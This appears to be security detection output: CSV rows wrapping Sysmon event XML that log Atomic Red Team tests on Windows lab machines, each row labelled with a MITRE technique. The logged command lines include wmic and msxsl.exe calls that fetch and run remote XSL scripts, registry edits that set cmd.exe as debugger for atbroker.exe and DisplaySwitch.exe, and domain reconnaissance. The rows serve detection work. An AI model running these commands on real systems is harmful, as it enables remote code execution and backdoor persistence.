+[T1059] Command-Line Interface,1563547869.845415,2019-07-19T18:51:09.845415+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "net view /domain" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3768
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:51:09.804
+ 747F3D96-D8DD-5D31-0000-0010EF923300
+ 4856
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "net view /domain"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547869.823311,2019-07-19T18:51:09.823311+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3767
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:51:06.873
+ 747F3D96-D8DA-5D31-0000-00100D8A3300
+ 4016
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1563547866.88803,2019-07-19T18:51:06.888030+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3766
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:51:06.748
+ 747F3D96-D8DA-5D31-0000-001029863300
+ 3220
+ C:\Windows\System32\wbem\WMIC.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ WMI Commandline Utility
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E
+ 747F3D96-D8DA-5D31-0000-0010D3833300
+ 5340
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547866.75324,2019-07-19T18:51:06.753240+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3765
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:51:06.714
+ 747F3D96-D8DA-5D31-0000-0010D3833300
+ 5340
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1563547866.75324,2019-07-19T18:51:06.753240+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3765
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:51:06.714
+ 747F3D96-D8DA-5D31-0000-0010D3833300
+ 5340
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1603194656.569246,2020-10-20T15:50:56.569246+04:00,,Threat,Low,Found User (DESKTOP-NTSSLJD\den) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 988
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ DESKTOP-NTSSLJD
+
+
+
+
+ technique_id=T1059.003,technique_name=Windows Command Shell
+ 2020-10-20 11:50:56.472
+ 23F38D93-CF20-5F8E-D008-000000000C00
+ 9620
+ C:\Windows\System32\cmd.exe
+ 10.0.18362.449 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ "C:\Windows\system32\cmd.exe"
+ C:\Windows\system32\
+ DESKTOP-NTSSLJD\den
+ 23F38D93-AE9B-5F8E-A2EC-170000000000
+ 0x17eca2
+ 2
+ High
+ SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 23F38D93-CF20-5F8E-CE08-000000000C00
+ 6896
+ C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe
+ C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe
+
+",DESKTOP-NTSSLJD,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547866.728089,2019-07-19T18:51:06.728089+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3764
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:50:56.162
+ 747F3D96-D8D0-5D31-0000-001034673300
+ 396
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1563547856.18299,2019-07-19T18:50:56.182990+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic.exe process /FORMAT:list ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3763
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:50:56.021
+ 747F3D96-D8D0-5D31-0000-0010F3623300
+ 7040
+ C:\Windows\System32\wbem\WMIC.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ WMI Commandline Utility
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ wmic.exe process /FORMAT:list
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E
+ 747F3D96-D8CF-5D31-0000-00109B603300
+ 5380
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547856.04777,2019-07-19T18:50:56.047770+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3762
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:50:55.978
+ 747F3D96-D8CF-5D31-0000-00109B603300
+ 5380
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1563547856.04777,2019-07-19T18:50:56.047770+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3762
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:50:55.978
+ 747F3D96-D8CF-5D31-0000-00109B603300
+ 5380
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547855.991996,2019-07-19T18:50:55.991996+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3761
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:50:53.038
+ 747F3D96-D8CD-5D31-0000-001047543300
+ 1852
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547853.062635,2019-07-19T18:50:53.062635+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3760
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:50:52.989
+ 747F3D96-D8CC-5D31-0000-001038513300
+ 948
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547853.011281,2019-07-19T18:50:53.011281+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3759
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:50:50.067
+ 747F3D96-D8CA-5D31-0000-0010CF443300
+ 6268
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547850.086593,2019-07-19T18:50:50.086593+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3758
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:50:50.029
+ 747F3D96-D8CA-5D31-0000-0010DA413300
+ 4004
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1563547850.046476,2019-07-19T18:50:50.046476+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ams15s30-in-f4.1e100.net ) , IP ( 172.217.17.132 ) and port ( 80 )",3,"
+
+
+
+
+ 3
+ 5
+ 4
+ 3
+ 0
+ 0x8000000000000000
+
+
+ 3757
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+ Suspicious NetCon
+ 2019-07-19 14:50:20.871
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ MSEDGEWIN10\IEUser
+ tcp
+ true
+ false
+ 10.0.2.15
+ MSEDGEWIN10.home
+ 49727
+
+ false
+ 172.217.17.132
+ ams15s30-in-f4.1e100.net
+ 80
+ http
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547825.37603,2019-07-19T18:50:25.376030+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3756
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:50:19.533
+ 747F3D96-D8AB-5D31-0000-0010A4D53200
+ 1888
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547819.491237,2019-07-19T18:50:19.491237+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3753
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:50:19.455
+ 747F3D96-D8AB-5D31-0000-001054D03200
+ 6244
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547819.467476,2019-07-19T18:50:19.467476+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3752
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:50:18.000
+ 747F3D96-D8AA-5D31-0000-0010C0C93200
+ 6016
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547817.963904,2019-07-19T18:50:17.963904+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3749
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:50:17.916
+ 747F3D96-D8A9-5D31-0000-001072C43200
+ 6068
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547817.941637,2019-07-19T18:50:17.941637+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
